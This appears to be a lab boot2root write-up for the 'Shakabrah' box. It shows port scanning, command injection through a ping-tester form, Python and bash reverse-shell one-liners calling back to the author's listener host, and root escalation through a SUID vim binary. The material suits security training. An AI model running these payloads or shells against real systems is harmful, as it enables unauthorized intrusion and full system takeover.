Shakabrah
June 17th, 2023
#Enumeration
Target IP given is: 192.168.239.86
Got OpenVAS working just for fun via docker. Only able to check the services and their versions for CVE's. No deep auto webapp vuln checking or exploitation from default scans.
##Nmap
nmap -p- -sV -sC --open -T4 192.168.239.86 -oN shakabrah_nmap.txt
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-17 16:57 GMT
Nmap scan report for 192.168.239.86
Host is up (0.053s latency).
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 33b96d350bc5c45a86e0261095487782 (RSA)
| 256 a80fa7738302c1978c25bafea5115f74 (ECDSA)
|_ 256 fce99ffef9e04d2d76eecadaafc3399e (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.03 seconds
##Dirbuster
Using /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Starting OWASP DirBuster 1.0-RC1
Starting dir/file list based brute forcing
File found: /index.php - 200
Dir found: / - 200
Dir found: /icons/ - 403
Dir found: /icons/small/ - 403
Nothing of note
##Site
It's a ping connection tester
https://i.imgur.com/pI8h8AF.png
Maybe I can do command injection / RCE
Running command behind ping
127.0.0.1 && cat /usr/passwd
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.027 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.022 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.037 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.028 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3062ms
rtt min/avg/max/mdev = 0.022/0.028/0.037/0.007 ms
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:110:1::/var/cache/pollinate:/bin/false
dylan:x:1000:1000:dylan,,,:/home/dylan:/bin/bash
etc/shadow doesn't return anything
Maybe the ssh key for dylan
127.0.0.1 && cat /home/dylan/.ssh/id_rsa
Nope. Maybe a python reverse shell.
python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("192.168.45.223",4444));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'
Nope. Maybe another one
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.223",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Nope. To confirm the connection
127.0.0.1; whoami
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.023 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.038 ms
64 bytes from 127.0.0.1: icmp_seq=4 ttl=64 time=0.042 ms
--- 127.0.0.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3069ms
rtt min/avg/max/mdev = 0.023/0.035/0.042/0.008 ms
www-data
Ok now will try with other reverse shells. If not maybe it's python3
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.223",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
So python isn't working. A bash rev shell should work though.
/bin/bash -l > /dev/tcp/192.168.45.223/4444 0<&1 2>&1
no dice. Maybe
sh -i >& /dev/udp/192.168.45.223/4444 0>&1
Great site for this: https://www.revshells.com/
uname -a
Linux shakabrah 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
suggested to try python 3 #2. Also suggested to run it over port 80 since it's already open
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.223",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
Works
⚠ kali 🏡
→ nc -nlvp 80 18:09:16
listening on [any] 80 ...
connect to [192.168.45.223] from (UNKNOWN) [192.168.239.86] 51928
www-data@shakabrah:/var/www/html$
www-data@shakabrah:/var$ cd
ls
cd
bash: cd: HOME not set
www-data@shakabrah:/var$ ls
backups crash local log opt snap tmp
cache lib lock mail run spool www
www-data@shakabrah:/var$ ls
ls
backups crash local log opt snap tmp
cache lib lock mail run spool www
www-data@shakabrah:/var$ cd /home
cd /home
www-data@shakabrah:/home$ ls
ls
dylan
www-data@shakabrah:/home$ cd dylan
cd dylan
www-data@shakabrah:/home/dylan$ ls
ls
local.txt
www-data@shakabrah:/home/dylan$ cat local.txt
cat local.txt
1f3b503a98dbaf166ee1e519c07edfd2
#Privilege Escalation
sudo -l prompts a password...
No .ssh profile for dylan
SUID program search
www-data@shakabrah:/home/dylan$ find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
< -perm -4000 -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 2675336 Mar 18 2020 /usr/bin/vim.basic
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 100760 Nov 22 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
So VIM
https://gtfobins.github.io/gtfobins/vim/
Running any of the things causes it to bug out a bit
$ vim -c ':py3 import vim; from ctypes import cdll; cdll.LoadLibrary("lib.so"); vim.command(":q!")'
E79: Cannot expand wildcardsm ctypes import cdll; cdll.LoadLibrary("lib.so"); vim.command(":q!")'
E79: Cannot expand wildcards
E79: Cannot expand wildcards
E79: Cannot expand wildcards
E79: Cannot expand wildcards
E79: Cannot expand wildcards
E79: Cannot expand wildcards
E79: Cannot expand wildcards
E79: Cannot expand wildcards
E79: Cannot expand wildcards
E79: Cannot expand wildcards
E79: Cannot expand wildcards
-- More --
So to make this work I'll refer to the same vim.basic location then run the command
/usr/bin/vim.basic -c ':py3 import os; os.execl("/bin/sh", "sh", "-c", "reset; exec sh -p")'
E79: Cannot expand wildcards
-- More --
Press ENTER or type command to continuereset: unknown terminal type unknown
Terminal type?
xterm or eterm bypasses this.
No dice though so trying another vim privesc
/usr/bin/vim.basic -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'
E79: Cannot expand wildcards
-- More --
E79: Cannot expand wildcards
-- More --
E79: Cannot expand wildcards
-- More --
E79: Cannot expand wildcards
-- More --
E79: Cannot expand wildcards
-- More --
E79: Cannot expand wildcards
-- More --
Press ENTER or type command to continuereset: unknown terminal type unknown
Terminal type? xterm
# whoami
whoami
root
# ls
ls
index.php
# cd
cd
# ls
ls
index.php
# cd /root
cd /root
# ls
ls
proof.txt
# cat proof.txt
cat proof.txt
88fbe377debfc7cf6b05bef1aa348e80
Boot2Root